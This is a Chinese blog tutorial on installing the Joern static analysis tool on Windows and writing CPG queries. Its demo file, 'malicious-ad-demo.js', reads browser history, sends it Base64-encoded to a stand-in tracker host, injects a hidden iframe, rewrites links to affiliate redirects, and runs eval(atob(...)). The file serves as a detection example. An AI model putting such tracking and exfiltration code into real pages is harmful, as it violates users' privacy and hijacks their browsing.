joern工具的使用

最新推荐文章于 2025-03-19 15:08:38 发布
最新推荐文章于 2025-03-19 15:08:38 发布
阅读量874 收藏 20
点赞数 12
文章标签: github windows 数据分析 scala
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zjgsdxcjy/article/details/145684144
版权

一、joern工具的含义

joern是用于基于CPG制作的静态扫描工具。

CPG(代码属性图)是由AST(abstract syntax tree抽象语法树)、CFG(control flow graph控制流图)、PDG(program dependence graph程序依赖图)结构融合而成的图形结构。

对于joern和CPG含义和概念方面的详情请参考:

深入浅出Joern(一)Joern与CPG是什么?-腾讯云开发者社区-腾讯云

二、joern工具的下载

在Windows系统下

不要在以下网站下载整个joern工具(因为我下了七天都没有成功o(╥﹏╥)o)

https://github.com/joernio/joern

最好下载joern-cli,网站为:Releases · joernio/joern · GitHub

下载joern-cli.zip

将下载的文件放到想放的位置

右击点开终端

在终端输入 

sbt stage

这里的速度就很快了(如果遇到报错,比如对于无法下载github上的东西就翻墙喽,或者直接在本地下载再放到专门的文件夹)

完成后,配置系统环境

根据你放joern-cli的位置配置系统环境。

这样就直接可以在终端使用joern工具了!(✿✿ヽ(°▽°)ノ✿ 此中艰苦你懂我也懂)

至于其他系统安装joern的方法可以参考GitHub - joernio/joern: Open-source code analysis platform for C/C++/Java/Binary/Javascript/Python/Kotlin based on code property graphs. Discord https://discord.gg/vv4MH284Hc

三、joern的使用

在终端打开joern工具

输入你要分析的文件(文件路径一定要用"/")

如此你就得到cpg

importCode("C:/Users/22617/Desktop/malicious-ad-demo.js")

malicious-ad-demo.js文件的内容为:

// ----------- 用户跟踪行为 -----------
// 1. 收集点击事件
document.addEventListener("click", function (e) {
    const clickData = {
        x: e.clientX,
        y: e.clientY,
        timestamp: Date.now(),
        page: window.location.href
    };
    // 将数据存储到本地
    localStorage.setItem("user_clicks", JSON.stringify(clickData));
});

// 2. 读取浏览历史(需chrome.history权限)
// 检测 manifest 中的权限声明(需单独分析 manifest.json) cpg.literal("\"chrome.history\"").location.l
chrome.history.search({ text: "" }, function (historyItems) {
    const historyData = historyItems.map(item => item.url);
    sendToTracker(historyData); // 发送到跟踪服务器
});

// ----------- 动态广告注入 -----------
// 3. 插入隐藏的广告iframe
const adIframe = document.createElement("iframe");
adIframe.style.display = "none";
adIframe.src = "https://malicious-ads.com/track?uid=12345";
document.body.appendChild(adIframe); 

// 4. 替换页面链接为附属链接
const links = document.querySelectorAll("a");
links.forEach(link => {
    const originalUrl = link.href;
    link.href = `https://affiliate-partner.net/redirect?ref=666&target=${encodeURIComponent(originalUrl)}`;
});

// ----------- 数据外传 -----------
// 5. 发送数据到广告服务器(Base64混淆)
function sendToTracker(data) {
    const encodedData = btoa(JSON.stringify(data));
    fetch("https://tracker-analytics.com/log", { 
        method: "POST",
        body: `data=${encodedData}`
    });
}

// 6. 动态执行远程脚本  cpg.call.where(_.argument.code(".*eval.*atob.*")).map(n=> List(n.lineNumber, n.code)).l
setTimeout(() => {
    const script = document.createElement("script");
    script.innerHTML = "eval(atob('ZG9jdW1lbnQud3JpdGUoIjwhLS0gQWRzIC0tPiIpOw=='));"; // 解码后为插入广告注释
    document.head.appendChild(script);
}, 5000);

 用这个命令可以检测到调用的函数和后面包含的代码内容。可以得到很多内容。

.*是正则表达式,用来表示省略的内容。

cpg.call.name("addEventListener").where(_.argument.code(".*click.*")).l

cpg.call.where(_.methodFullName(".*localStorage\\.setItem.*")).l

用"|" 表示或者

cpg.call.name("appendChild|insertAdjacentHTML|innerHTML").l

用map()显示你想要的具体内容。map(n=> List(n.lineNumber, n.code)显示行数和具体代码。

cpg.call.where(_.argument.code(".*eval.*atob.*")).map(n=> List(n.lineNumber, n.code)).l

具体其他使用方法请参考官方文档:

Overview | Joern Documentation

目前我就了解到这里啦,但是我现在使用的joern工具不能检测大数据量的js文件,不知道哪里出了问题。希望有大佬能帮我解答一下。当然,如果我后期解决了一定会继续分享的。(保佑我吧

源码分析工具joern使用教程
SHELLCODE_8BIT的博客
10-05 3395
Joern 是一个对源代码、字节码和二进制代码进行稳健分析的平台。它生成代码属性图,一种用于跨语言代码分析的代码图形表示。代码属性图存储在自定义图数据库中。这允许使用以基于 Scala 的特定领域查询语言制定的搜索查询来挖掘代码。Joern 的开发目标是为静态程序分析中的漏洞发现和研究提供有用的工joern 现在支持的语言:NameBased onMaturityC/C++HighC/C++Highx86/x64GhidraMediumJVMSootMediumLLVM。
joern 基本使用介绍
热门推荐
qq_36281420的博客
03-08 1万+
这里joern写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何
joern安装+简单使用
weixin_44019380的博客
08-14 2381
joern安装及简单使用
Joern代码分析工具解析
最新发布
编程小栈
03-19 786
Joern 是一款专注于代码安全分析的开源静态分析工具,旨在帮助开发者、安全研究人员自动化识别代码中的漏洞与潜在风险。其核心设计理念是通过构建代码属性图(Code Property Graph, CPG)​,将代码的语法、语义、数据流、控制流等多维度信息统一建模,从而支持复杂的代码逻辑推理。
Joern工具分析
qq_44370676的博客
02-28 1074
joern-cli工作流程
Joern生成各种图
apple_53406386的博客
04-02 2163
Joern基本使用
joern使用
qq5132834的专栏
03-11 604
2、分析C/C++源代码生成cpg文件,主要通过。1、创建第一个main.c文件。3、 导入cpg进行分析。4、 querydb使用
joern使用
jlu_wangqi的博客
06-20 1337
使用joern-tools进行代码分析 通过使用joern-tools提供的命令来寻找bugs和vulnerabilities,前半部分提供了使用joern的简短的命令和更长的查询,这些查询说明了joern的工作原理。后半部分提供了能够让人使用joern-tools工具根据特殊需要进行扩展。 导入代码: ./joern 需要解析的代码目录在neo4j−server.properties文件中更改下面的语句org.neo4j.server.database.location=需要解析的代码目录 在neo4j-
使用 Joern 进行漏洞挖掘
有价值炮灰
09-18 2333
使用 Joern 进行静态分析和代码审计
Deepwukong项目joern安装使用教程
wangyifan4576的博客
09-03 716
在将joern的源码下载后,复制到wukong项目的根目录下。该项目使用老版本的joern,用来解析c和c++语言,构建程序的程序依赖图PDG。该工具生成的是nodes.csv和edges.csv 文件。至此,如果一切顺利的话,那么你将成功解析项目中data下面的c和cpp文件。edges.csv是这样的:主要包含边的类型以及起始和结束位置。joern 是直接在 README.md 中给出的地址下载的源码。其中nodes.csv是这样的:主要包含节点的一些属性。
python-joern-0.3.1,优质资源配备齐全下载解压即可使用,具体使用过程详见主页文章
07-22
python-joern-0.3.1,优质资源配备齐全下载解压即可使用,具体使用过程详见主页文章
joern安装手册.zip
09-06
Joern是一款强大的源代码分析工具,主要用于静态分析Java和C/C++程序的控制流和数据流特性。它基于图数据库,能够对大型软件项目进行深入的结构和安全分析。在这个"joern安装手册.zip"文件中,我们预计将找到有关...
源码分析工具Joern的相关资料整理
^_^
09-07 1146
随着对joern的了解,发现这个工具的潜能挺大的。但实际上手起来还是有点难度。这里列举一些对学习joern有帮助的相关资料博客。 joern官方文档:https://docs.joern.io/ joern讨论社区:https://gitter.im/joern-code-analyzer/community?source=orgpage# 在用joern之前可能要先学点scala,这里随便列了一个教程(有基础的可以无视): 慕课网:https://www.imooc.com/learn/613 菜鸟.
Joern工具安装使用-Ubuntu
weixin_45131189的博客
09-29 1543
本文通过连接Linux服务器是现在Ubuntu下的Joern工具的安装及使用
源码分析工具Joern的安装(新旧版本)
^_^
06-17 3520
文章目录老版本安装新版本安装依赖库安装预先build好的二进制程序设置一下分配的内存大小测试一下安装的结果 老版本安装 官方链接:https://joern.readthedocs.io/en/latest/installation.html 老版本安装的话,可能会遇到的问题是neo4j的老版本比较难下载。一些博客也给出了解决方案:https://blog.youkuaiyun.com/water_likly/article/details/88415127 新版本安装 官方链接:https://joern.io/do
程序分析-Joern工具工作流程分析
qq_44370676的博客
06-12 5193
主要介绍Joern的工作流程。
Joern工具下载与使用
weixin_43723467的博客
05-15 2112
Joern工具安装与使用
代码属性图之-joern初探
water_likly的博客
04-18 3547
本文仅作交流学习使用,严谨转载!!! 一 Joern安装 参考上篇博客https://blog.youkuaiyun.com/water_likly/article/details/88415127 二 Joern的初步使用 Joern使用主要涉及到python-joern,neo4j的操作,本文仅作初步的学习。参考链接:Joern 首先,Joern是用来分析C/C++程序的,因此,我们先从网上或...
joern安装windows
09-20
joern是一个用于分析和可视化代码的开源工具。然而,joern不支持在Windows上安装。它主要设计用于在Linux和Mac OS X系统上使用。因此,如果你想在Windows使用joern,你需要考虑在虚拟机中安装Linux或者使用WSL (Windows Subsystem for Linux)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值